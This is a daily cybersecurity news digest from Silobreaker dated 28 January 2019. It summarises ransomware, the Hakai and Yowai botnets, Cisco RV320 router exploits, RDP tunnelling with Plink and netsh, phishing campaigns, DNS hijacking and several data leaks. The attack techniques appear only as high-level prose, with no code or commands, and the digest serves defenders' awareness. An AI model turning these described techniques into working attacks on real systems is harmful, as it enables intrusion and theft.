Silobreaker Daily Cyber Digest – 28 January 2019
MalwareHunterTeam discover new ransomware with malicious ransom note
- The researchers discovered the ransomware, dubbed CryTekk, has added a social engineering tactic to its ransom note. The note provides an additional payment option for victims who want to gain their files back but don’t have a cryptocurrency wallet.
- Clicking the ‘Buy now’ button in PayPal opens a tab that directs users to a phishing page asking for card details. If this is filled in, and the ‘agree and confirm’ button is clicked, users are directed to another phishing page that asks for more personal information.
- Victims are then shown a page stating that their account has been fully restored, which suggests that they have in fact not been paying the ransom but instead have had their details stolen.
ThinkPHP vulnerability exploited by Hakai and Yowai botnets
- Trend Micro researchers reported that attackers are using websites created using the PHP framework to breach web servers via dictionary attacks on default credentials. The infected devices are being used as part of the Hakai and Yowai botnets to launch distributed denial-of-service (DDoS) attacks.
- The Yowai botnet was found to have a similar configuration table as the Mirai botnet. Its configuration table can be decrypted via the same procedures and adds the ThinkPHP exploit with other known vulnerabilities, such as CVE-2014-8361 or CVE-2018-10561, in its list of infection vectors. Yowai listens on port 6 to receive commands from the C&C server. After infecting a router, it launches a dictionary attack in an attempt to infect other devices.
- The Hakai botnet was discovered to be variant of the Gafgyt botnet. It was previously seen infecting IoT devices and relied on router vulnerabilities for propagation. The exploited flaws include CVE-2015-2051, CVE-2014-8361 or CVE-2017-17215.
Source (Includes IOCs)
Hackers target Cisco RV320 & RV325 routers with new exploits
- The disclosure of a proof of exploit code for security flaws in Cisco routers has led hackers to scan for vulnerable devices in an attempt to gain full control of them. Updates were released this week, fixing a command injection flaw tracked as CVE-2019-1652, and an information disclosure flaw tracked as CVE-2019-1653, both present in the routers’ web management interface.
- The exploit code detailed how a hacker chaining these two flaws together could obtain hashed access credentials for a privileged account, and therefore be able to run arbitrary commands as root.
- According to Troy Mursch, over 9,550 out of 20,000 reachable routers, mostly in the US, were found to be infected by the information disclosure flaw, and hackers have started searching for them.
Attackers conducting RDP attacks increasingly using network tunnelling to bypass protections
- FireEye researchers observed that threat actors are using native Windows Remote Desktop Protocol (RDP) utilities to connect laterally across systems in compromised environments. Through network tunnelling and host-based port forwarding, attackers have been increasingly able to bypass firewalls and NAT rules.
- According to the researchers, a common utility used to tunnel RDP sessions is PuTTY Link, which can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. FireEye states that ‘since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attackers C&C server.’
- FireEye has also found that attackers are using the Windows Network Shell (netsh) command to utilize RDP port forwarding to access newly uncovered segmented networks reachable only through an administrative jump box.
Two malicious campaigns targeting naval industry deliver Adwind RAT
- Cybaze-Yoroi ZLab researchers found infection attempts aiming to install Adwind RAT on victims’ machines. Two waves of malicious emails were observed targeting the naval industry.
- In the first wave, emails were disguised as purchase orders impersonating administrative staff of an Italian company operating in hydraulic and lifting sectors. In the second wave, the emails were impersonating a German logistics company.
- Upon further inspection, the researchers discovered that the two campaigns were linked to the same threat actor. The dropper samples were found to have the same encoded payload strings.
Source (Includes IOCs)
DNS hijacking activity targets multiple sectors since 2017
- Researchers at Crowdstrike discovered a subset of domains affected by the recent widespread DNS hijacking activity. They found that 28 organizations in 12 countries were affected so far. Targets include government organizations, insurance firms, civilian aviation firms, internet service providers and infrastructure providers. Some of the targeted organizations were affected as far back as February 2017.
- According to Crowdstrike, the ultimate objective of the campaign remains unknown, however DNS hijacking could allow perpetrators to capture content of web traffic going to affected domains and potentially exploit the captured data in subsequent operations.
- Although Crowdstrike does not attribute the activity to any specific threat actor, the firm acknowledges that public reporting has indicated that several factors point to a possible Iranian nexus for the operation.
GandCrab and Ursnif ransomware delivered in email phishing campaign
- Discovered by researchers at Carbon Black, the emails are delivering malicious Word documents as attachments that contain embedded macros. The macros deliver GandCrab and Ursnif variants that are capable of gathering system data before encrypting it to extort payment.
- It is unclear how many victims are in the campaign, but researchers estimate that there are at least 180 Word document variants in the wild.
Hackers increasingly focusing efforts on disruption of Ukraine’s presidential election
- Reuters reported that hackers likely controlled by Russia are increasingly targeting electoral servers and personal computers of staff involved in the upcoming Ukrainian presidential elections set to take place in March.
- According to the head of Ukraine’s cyber police, Serhiy Demedyuk, attackers are using virus-infected New Year’s greeting cards, shopping invitations, software updates offers, and other phishing material to steal passwords and personal information from victims. Hackers were also observed buying personal details of election officials on the dark web.
Leaks and Breaches
Data breach affects five health insurers in Delaware
- Delaware Department of Insurance officials stated that five health insurers and about 650 of their members were affected by a data breach at a third-party administrator, BenefitMall, in October 2018.
- Individuals with health insurance at Highmark BCBS, Aetna, Emblem Health, Humana, or UnitedHealth may have been affected.
B&Q data leak exposes information on thefts and suspected offenders
- A database of 70,000 offender and incident logs has been accessible internally for anyone to access. The data was held on an Elasticsearch server with no password.
- The exposed data includes some people’s names and vehicle details. Ctrlbox’s Lee Johnstone discovered the leak and informed B&Q via Twitter, after which the data remained accessible for a further two weeks before the server was taken offline.
LocalBitcoins suffer security breach
- The breach occurred around January 26th, 2019, for approximately five hours before the company intervened. The LocalBitcoins forum was redirecting users to a page mimicking its login form, and was also capable of asking for 2FA codes, if accounts used this mechanism.
- The company later confirmed that the forum had been breached via a vulnerability in a feature powered by third party software, and that the feature was disabled until further notice. In total, 7.95 Bitcoins, with an approximate market value of $28,200, were stolen.
- They have since stated their LocalBitcoins accounts are currently safe to use, and that two-factor authentication should be enabled if it hasn’t already been.
Ascension’s financial files exposed via unsecure Amazon S3 bucket and Elasticsearch server
- Security researcher Bob Diachenko and TechCrunch found that an Amazon S3 storage server, belonging to Texas-based Ascension, and managed by a third-party vendor OpticsML, leaked documents belonging to banks and financial institutions across the US, including loans and mortgage agreements.
- The unsecured server contained 21 files consisting of 23,000 pages of PDF documents. Some of the documents were found to be from the US Department of Housing and Urban Development, while others included W-2 tax forms, loan repayment schedules and other sensitive financial information. Many of the files also contained names, addresses, phone numbers and Social Security numbers.
- Some of the same data, belonging to Ascension and totalling to over 24 million financial and banking documents, was previously found to be exposed via an unprotected Elasticsearch database by Diachenko on January 10th, 2018.
Dailymotion reset passwords following a credential stuffing attack
- Dailymotion announced that some of their accounts had been targeted in a credential stuffing attack. The company stated that the security team recognised the unauthorised access attempts on January 19th and the attack was still running six days later.
Multiple vulnerabilities discovered in industrial switches
- Six vulnerabilities discovered in FL switches by Phoenix Contact can be exploited to conduct unauthorised activities, including a denial-of-service condition or a man-in-the-middle (MitM) attack. These affect the 3xxx, 4xxx, and 48xx series switches running firmware version 1.35 or prior.
- The flaws include a cross-site request forgery issue, a brute force attack vulnerability on a username and password interface, and a web interface accessed over HTTP, allowing a MitM interception attack.
- The vulnerabilities have since been addressed in the latest firmware update released by Phoenix Contact.
Vulnerabilities discovered in LabKey server
- The vulnerabilities include CVE-2019-3911, a cross-site scripting flaw as a result of poor validation and sanitization, CVE-2019-3912, an issue that allows open redirects due to an unsanitized function allowing return paths to be edited, and CVE-2019-3913, a logic flaw in LabKey server’s network drive mapping functionality.
PDF exploit utilises steganographic techniques
- The malicious sample was detected as CVE-2013-3346, and researchers have noted that the technique is effective, and were impressed by its efficiency.
WordPress WOSD protection feature could leave WordPress sites vulnerable
- The new feature is included in WordPress CMS 5.1 WSOD protection and built to ensure the platform can detect fatal PHP errors and determine the plugin or theme responsible. Researchers have stated that this could allow attackers to cause a PHP error in a plugin and intrude once the WSOD protection feature stops the plugin from executing.
Data leak in Ghostscript permits routine takeover and command execution
- Researcher Tavis Ormandy discovered that Ghostscript fails to protect subroutines correctly, resulting in data leaks and in an attacker taking over the routine or even executing commands on systems.
- The vulnerability is tracked as CVE-2019-6116 and has since been patched.
Test finds large proportion of keyless cars vulnerable to relay attacks
- A test of 237 keyless cars by the German General Automobile Club (ADAC) found that 230 of them could be easily unlocked by criminals using cheap electronic equipment bought online.
- Popular cars such as Ford Fiesta, Volkswagen Golf, Nissan Qashqai or Ford Focus were found to be vulnerable to this form of attack.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.